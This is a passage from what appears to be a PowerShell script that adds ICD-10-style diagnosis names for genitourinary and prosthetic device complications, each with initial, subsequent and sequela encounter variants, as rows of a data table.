prosthetic device, implant and graft","Unspecified complication of cardiac and vascular prosthetic device, implant and graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of cardiac and vascular prosthetic device, implant and graft","Unspecified complication of cardiac and vascular prosthetic device, implant and graft, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cystostomy catheter","Breakdown (mechanical) of cystostomy catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cystostomy catheter","Breakdown (mechanical) of cystostomy catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cystostomy catheter","Breakdown (mechanical) of cystostomy catheter, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of indwelling urethral catheter","Breakdown (mechanical) of indwelling urethral catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of indwelling urethral catheter","Breakdown (mechanical) of indwelling urethral catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of indwelling urethral catheter","Breakdown (mechanical) of indwelling urethral catheter, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of nephrostomy catheter","Breakdown (mechanical) of nephrostomy catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of nephrostomy catheter","Breakdown (mechanical) of nephrostomy catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of nephrostomy catheter","Breakdown (mechanical) of nephrostomy catheter, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other urinary catheter","Breakdown (mechanical) of other urinary catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other urinary catheter","Breakdown (mechanical) of other urinary catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other urinary catheter","Breakdown (mechanical) of other urinary catheter, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of cystostomy catheter","Displacement of cystostomy catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of cystostomy catheter","Displacement of cystostomy catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of cystostomy catheter","Displacement of cystostomy catheter, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of indwelling urethral catheter","Displacement of indwelling urethral catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of indwelling urethral catheter","Displacement of indwelling urethral catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of indwelling urethral catheter","Displacement of indwelling urethral catheter, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of nephrostomy catheter","Displacement of nephrostomy catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of nephrostomy catheter","Displacement of nephrostomy catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of nephrostomy catheter","Displacement of nephrostomy catheter, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other urinary catheter","Displacement of other urinary catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other urinary catheter","Displacement of other urinary catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other urinary catheter","Displacement of other urinary catheter, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of cystostomy catheter","Leakage of cystostomy catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of cystostomy catheter","Leakage of cystostomy catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of cystostomy catheter","Leakage of cystostomy catheter, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of indwelling urethral catheter","Leakage of indwelling urethral catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of indwelling urethral catheter","Leakage of indwelling urethral catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of indwelling urethral catheter","Leakage of indwelling urethral catheter, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of nephrostomy catheter","Leakage of nephrostomy catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of nephrostomy catheter","Leakage of nephrostomy catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of nephrostomy catheter","Leakage of nephrostomy catheter, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of other urinary catheter","Leakage of other urinary catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of other urinary catheter","Leakage of other urinary catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of other urinary catheter","Leakage of other urinary catheter, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cystostomy catheter","Other mechanical complication of cystostomy catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cystostomy catheter","Other mechanical complication of cystostomy catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cystostomy catheter","Other mechanical complication of cystostomy catheter, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of indwelling urethral catheter","Other mechanical complication of indwelling urethral catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of indwelling urethral catheter","Other mechanical complication of indwelling urethral catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of indwelling urethral catheter","Other mechanical complication of indwelling urethral catheter, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of nephrostomy catheter","Other mechanical complication of nephrostomy catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of nephrostomy catheter","Other mechanical complication of nephrostomy catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of nephrostomy catheter","Other mechanical complication of nephrostomy catheter, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other urinary catheter","Other mechanical complication of other urinary catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other urinary catheter","Other mechanical complication of other urinary catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other urinary catheter","Other mechanical complication of other urinary catheter, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of urinary electronic stimulator device","Breakdown (mechanical) of urinary electronic stimulator device, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of urinary electronic stimulator device","Breakdown (mechanical) of urinary electronic stimulator device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of urinary electronic stimulator device","Breakdown (mechanical) of urinary electronic stimulator device, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted urinary sphincter","Breakdown (mechanical) of implanted urinary sphincter, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted urinary sphincter","Breakdown (mechanical) of implanted urinary sphincter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted urinary sphincter","Breakdown (mechanical) of implanted urinary sphincter, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of indwelling ureteral stent","Breakdown (mechanical) of indwelling ureteral stent, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of indwelling ureteral stent","Breakdown (mechanical) of indwelling ureteral stent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of indwelling ureteral stent","Breakdown (mechanical) of indwelling ureteral stent, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other urinary stents","Breakdown (mechanical) of other urinary stents, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other urinary stents","Breakdown (mechanical) of other urinary stents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other urinary stents","Breakdown (mechanical) of other urinary stents, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other urinary devices and implants","Breakdown (mechanical) of other urinary devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other urinary devices and implants","Breakdown (mechanical) of other urinary devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other urinary devices and implants","Breakdown (mechanical) of other urinary devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of urinary electronic stimulator device","Displacement of urinary electronic stimulator device, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of urinary electronic stimulator device","Displacement of urinary electronic stimulator device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of urinary electronic stimulator device","Displacement of urinary electronic stimulator device, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of implanted urinary sphincter","Displacement of implanted urinary sphincter, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted urinary sphincter","Displacement of implanted urinary sphincter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted urinary sphincter","Displacement of implanted urinary sphincter, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of indwelling ureteral stent","Displacement of indwelling ureteral stent, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of indwelling ureteral stent","Displacement of indwelling ureteral stent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of indwelling ureteral stent","Displacement of indwelling ureteral stent, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other urinary stents","Displacement of other urinary stents, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other urinary stents","Displacement of other urinary stents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other urinary stents","Displacement of other urinary stents, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other urinary devices and implants","Displacement of other urinary devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other urinary devices and implants","Displacement of other urinary devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other urinary devices and implants","Displacement of other urinary devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of urinary electronic stimulator device","Other mechanical complication of urinary electronic stimulator device, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of urinary electronic stimulator device","Other mechanical complication of urinary electronic stimulator device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of urinary electronic stimulator device","Other mechanical complication of urinary electronic stimulator device, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted urinary sphincter","Other mechanical complication of implanted urinary sphincter, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted urinary sphincter","Other mechanical complication of implanted urinary sphincter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted urinary sphincter","Other mechanical complication of implanted urinary sphincter, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of indwelling ureteral stent","Other mechanical complication of indwelling ureteral stent, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of indwelling ureteral stent","Other mechanical complication of indwelling ureteral stent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of indwelling ureteral stent","Other mechanical complication of indwelling ureteral stent, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other urinary stent","Other mechanical complication of other urinary stent, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other urinary stent","Other mechanical complication of other urinary stent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other urinary stent","Other mechanical complication of other urinary stent, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other urinary devices and implants","Other mechanical complication of other urinary devices and implants, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other urinary devices and implants","Other mechanical complication of other urinary devices and implants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other urinary devices and implants","Other mechanical complication of other urinary devices and implants, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of graft of urinary organ","Breakdown (mechanical) of graft of urinary organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of graft of urinary organ","Breakdown (mechanical) of graft of urinary organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of graft of urinary organ","Breakdown (mechanical) of graft of urinary organ, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of graft of urinary organ","Displacement of graft of urinary organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of graft of urinary organ","Displacement of graft of urinary organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of graft of urinary organ","Displacement of graft of urinary organ, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of graft of urinary organ","Leakage of graft of urinary organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of graft of urinary organ","Leakage of graft of urinary organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of graft of urinary organ","Leakage of graft of urinary organ, sequela") + $null = $DiagnosisList.Rows.Add("Erosion of graft of urinary organ","Erosion of graft of urinary organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Erosion of graft of urinary organ","Erosion of graft of urinary organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Erosion of graft of urinary organ","Erosion of graft of urinary organ, sequela") + $null = $DiagnosisList.Rows.Add("Exposure of graft of urinary organ","Exposure of graft of urinary organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure of graft of urinary organ","Exposure of graft of urinary organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure of graft of urinary organ","Exposure of graft of urinary organ, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of graft of urinary organ","Other mechanical complication of graft of urinary organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of graft of urinary organ","Other mechanical complication of graft of urinary organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of graft of urinary organ","Other mechanical complication of graft of urinary organ, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of intrauterine contraceptive device","Breakdown (mechanical) of intrauterine contraceptive device, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of intrauterine contraceptive device","Breakdown (mechanical) of intrauterine contraceptive device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of intrauterine contraceptive device","Breakdown (mechanical) of intrauterine contraceptive device, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of intrauterine contraceptive device","Displacement of intrauterine contraceptive device, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of intrauterine contraceptive device","Displacement of intrauterine contraceptive device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of intrauterine contraceptive device","Displacement of intrauterine contraceptive device, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of intrauterine contraceptive device","Other mechanical complication of intrauterine contraceptive device, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of intrauterine contraceptive device","Other mechanical complication of intrauterine contraceptive device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of intrauterine contraceptive device","Other mechanical complication of intrauterine contraceptive device, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted penile prosthesis","Breakdown (mechanical) of implanted penile prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted penile prosthesis","Breakdown (mechanical) of implanted penile prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted penile prosthesis","Breakdown (mechanical) of implanted penile prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted testicular prosthesis","Breakdown (mechanical) of implanted testicular prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted testicular prosthesis","Breakdown (mechanical) of implanted testicular prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted testicular prosthesis","Breakdown (mechanical) of implanted testicular prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other prosthetic devices, implants and grafts of genital tract","Breakdown (mechanical) of other prosthetic devices, implants and grafts of genital tract, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other prosthetic devices, implants and grafts of genital tract","Breakdown (mechanical) of other prosthetic devices, implants and grafts of genital tract, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other prosthetic devices, implants and grafts of genital tract","Breakdown (mechanical) of other prosthetic devices, implants and grafts of genital tract, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of implanted penile prosthesis","Displacement of implanted penile prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted penile prosthesis","Displacement of implanted penile prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted penile prosthesis","Displacement of implanted penile prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of implanted testicular prosthesis","Displacement of implanted testicular prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted testicular prosthesis","Displacement of implanted testicular prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of implanted testicular prosthesis","Displacement of implanted testicular prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other prosthetic devices, implants and grafts of genital tract","Displacement of other prosthetic devices, implants and grafts of genital tract, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other prosthetic devices, implants and grafts of genital tract","Displacement of other prosthetic devices, implants and grafts of genital tract, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other prosthetic devices, implants and grafts of genital tract","Displacement of other prosthetic devices, implants and grafts of genital tract, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted penile prosthesis","Other mechanical complication of implanted penile prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted penile prosthesis","Other mechanical complication of implanted penile prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted penile prosthesis","Other mechanical complication of implanted penile prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted testicular prosthesis","Other mechanical complication of implanted testicular prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted testicular prosthesis","Other mechanical complication of implanted testicular prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of implanted testicular prosthesis","Other mechanical complication of implanted testicular prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other prosthetic devices, implants and grafts of genital tract","Other mechanical complication of other prosthetic devices, implants and grafts of genital tract, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other prosthetic devices, implants and grafts of genital tract","Other mechanical complication of other prosthetic devices, implants and grafts of genital tract, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other prosthetic devices, implants and grafts of genital tract","Other mechanical complication of other prosthetic devices, implants and grafts of genital tract, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to cystostomy catheter","Infection and inflammatory reaction due to cystostomy catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to cystostomy catheter","Infection and inflammatory reaction due to cystostomy catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to cystostomy catheter","Infection and inflammatory reaction due to cystostomy catheter, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to indwelling urethral catheter","Infection and inflammatory reaction due to indwelling urethral catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to indwelling urethral catheter","Infection and inflammatory reaction due to indwelling urethral catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to indwelling urethral catheter","Infection and inflammatory reaction due to indwelling urethral catheter, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to nephrostomy catheter","Infection and inflammatory reaction due to nephrostomy catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to nephrostomy catheter","Infection and inflammatory reaction due to nephrostomy catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to nephrostomy catheter","Infection and inflammatory reaction due to nephrostomy catheter, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other urinary catheter","Infection and inflammatory reaction due to other urinary catheter, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other urinary catheter","Infection and inflammatory reaction due to other urinary catheter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other urinary catheter","Infection and inflammatory reaction due to other urinary catheter, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted urinary neurostimulation device","Infection and inflammatory reaction due to implanted urinary neurostimulation device, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted urinary neurostimulation device","Infection and inflammatory reaction due to implanted urinary neurostimulation device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted urinary neurostimulation device","Infection and inflammatory reaction due to implanted urinary neurostimulation device, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted urinary sphincter","Infection and inflammatory reaction due to implanted urinary sphincter, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted urinary sphincter","Infection and inflammatory reaction due to implanted urinary sphincter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted urinary sphincter","Infection and inflammatory reaction due to implanted urinary sphincter, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to indwelling ureteral stent","Infection and inflammatory reaction due to indwelling ureteral stent, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to indwelling ureteral stent","Infection and inflammatory reaction due to indwelling ureteral stent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to indwelling ureteral stent","Infection and inflammatory reaction due to indwelling ureteral stent, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other urinary stents","Infection and inflammatory reaction due to other urinary stents, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other urinary stents","Infection and inflammatory reaction due to other urinary stents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other urinary stents","Infection and inflammatory reaction due to other urinary stents, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other prosthetic device, implant and graft in urinary system","Infection and inflammatory reaction due to other prosthetic device, implant and graft in urinary system, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other prosthetic device, implant and graft in urinary system","Infection and inflammatory reaction due to other prosthetic device, implant and graft in urinary system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other prosthetic device, implant and graft in urinary system","Infection and inflammatory reaction due to other prosthetic device, implant and graft in urinary system, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted penile prosthesis","Infection and inflammatory reaction due to implanted penile prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted penile prosthesis","Infection and inflammatory reaction due to implanted penile prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted penile prosthesis","Infection and inflammatory reaction due to implanted penile prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted testicular prosthesis","Infection and inflammatory reaction due to implanted testicular prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted testicular prosthesis","Infection and inflammatory reaction due to implanted testicular prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to implanted testicular prosthesis","Infection and inflammatory reaction due to implanted testicular prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other prosthetic device, implant and graft in genital tract","Infection and inflammatory reaction due to other prosthetic device, implant and graft in genital tract, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other prosthetic device, implant and graft in genital tract","Infection and inflammatory reaction due to other prosthetic device, implant and graft in genital tract, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other prosthetic device, implant and graft in genital tract","Infection and inflammatory reaction due to other prosthetic device, implant and graft in genital tract, sequela") + $null = $DiagnosisList.Rows.Add("Erosion of implanted vaginal mesh to surrounding organ or tissue","Erosion of implanted vaginal mesh to surrounding organ or tissue, initial encounter") + $null = $DiagnosisList.Rows.Add("Erosion of implanted vaginal mesh to surrounding organ or tissue","Erosion of implanted vaginal mesh to surrounding organ or tissue, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Erosion of implanted vaginal mesh to surrounding organ or tissue","Erosion of implanted vaginal mesh to surrounding organ or tissue, sequela") + $null = $DiagnosisList.Rows.Add("Erosion of implanted urethral mesh to surrounding organ or tissue","Erosion of implanted urethral mesh to surrounding organ or tissue, initial encounter") + $null = $DiagnosisList.Rows.Add("Erosion of implanted urethral mesh to surrounding organ or tissue","Erosion of implanted urethral mesh to surrounding organ or tissue, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Erosion of implanted urethral mesh to surrounding organ or tissue","Erosion of implanted urethral mesh to surrounding organ or tissue, sequela") + $null = $DiagnosisList.Rows.Add("Erosion of implanted urethral bulking agent to surrounding organ or tissue","Erosion of implanted urethral bulking agent to surrounding organ or tissue, initial encounter") + $null = $DiagnosisList.Rows.Add("Erosion of implanted urethral bulking agent to surrounding organ or tissue","Erosion of implanted urethral bulking agent to surrounding organ or tissue, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Erosion of implanted urethral bulking agent to surrounding organ or tissue","Erosion of implanted urethral bulking agent to surrounding organ or tissue, sequela") + $null = $DiagnosisList.Rows.Add("Erosion of implanted ureteral bulking agent to surrounding organ or tissue","Erosion of implanted ureteral bulking agent to surrounding organ or tissue, initial encounter") + $null = $DiagnosisList.Rows.Add("Erosion of implanted ureteral bulking agent to surrounding organ or tissue","Erosion of implanted ureteral bulking agent to surrounding organ or tissue, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Erosion of implanted ureteral bulking agent to surrounding organ or tissue","Erosion of implanted ureteral bulking agent to surrounding organ or tissue, sequela") + $null = $DiagnosisList.Rows.Add("Erosion of other implanted mesh to organ or tissue","Erosion of other implanted mesh to organ or tissue, initial encounter") + $null = $DiagnosisList.Rows.Add("Erosion of other implanted mesh to organ or tissue","Erosion of other implanted mesh to organ or tissue, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Erosion of other implanted mesh to organ or tissue","Erosion of other implanted mesh to organ or tissue, sequela") + $null = $DiagnosisList.Rows.Add("Erosion of other prosthetic materials to surrounding organ or tissue","Erosion of other prosthetic materials to surrounding organ or tissue, initial encounter") + $null = $DiagnosisList.Rows.Add("Erosion of other prosthetic materials to surrounding organ or tissue","Erosion of other prosthetic materials to surrounding organ or tissue, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Erosion of other prosthetic materials to surrounding organ or tissue","Erosion of other prosthetic materials to surrounding organ or tissue, sequela") + $null = $DiagnosisList.Rows.Add("Exposure of implanted vaginal mesh into vagina","Exposure of implanted vaginal mesh into vagina, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure of implanted vaginal mesh into vagina","Exposure of implanted vaginal mesh into vagina, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure of implanted vaginal mesh into vagina","Exposure of implanted vaginal mesh into vagina, sequela") + $null = $DiagnosisList.Rows.Add("Exposure of implanted urethral mesh into urethra","Exposure of implanted urethral mesh into urethra, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure of implanted urethral mesh into urethra","Exposure of implanted urethral mesh into urethra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure of implanted urethral mesh into urethra","Exposure of implanted urethral mesh into urethra, sequela") + $null = $DiagnosisList.Rows.Add("Exposure of implanted urethral bulking agent into urethra","Exposure of implanted urethral bulking agent into urethra, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure of implanted urethral bulking agent into urethra","Exposure of implanted urethral bulking agent into urethra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure of implanted urethral bulking agent into urethra","Exposure of implanted urethral bulking agent into urethra, sequela") + $null = $DiagnosisList.Rows.Add("Exposure of implanted ureteral bulking agent into ureter","Exposure of implanted ureteral bulking agent into ureter, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure of implanted ureteral bulking agent into ureter","Exposure of implanted ureteral bulking agent into ureter, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure of implanted ureteral bulking agent into ureter","Exposure of implanted ureteral bulking agent into ureter, sequela") + $null = $DiagnosisList.Rows.Add("Exposure of other implanted mesh into organ or tissue","Exposure of other implanted mesh into organ or tissue, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure of other implanted mesh into organ or tissue","Exposure of other implanted mesh into organ or tissue, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure of other implanted mesh into organ or tissue","Exposure of other implanted mesh into organ or tissue, sequela") + $null = $DiagnosisList.Rows.Add("Exposure of other prosthetic materials into organ or tissue","Exposure of other prosthetic materials into organ or tissue, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure of other prosthetic materials into organ or tissue","Exposure of other prosthetic materials into organ or tissue, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure of other prosthetic materials into organ or tissue","Exposure of other prosthetic materials into organ or tissue, sequela") + $null = $DiagnosisList.Rows.Add("Other specified complications due to other genitourinary prosthetic materials","Other specified complications due to other genitourinary prosthetic materials, initial encounter") + $null = 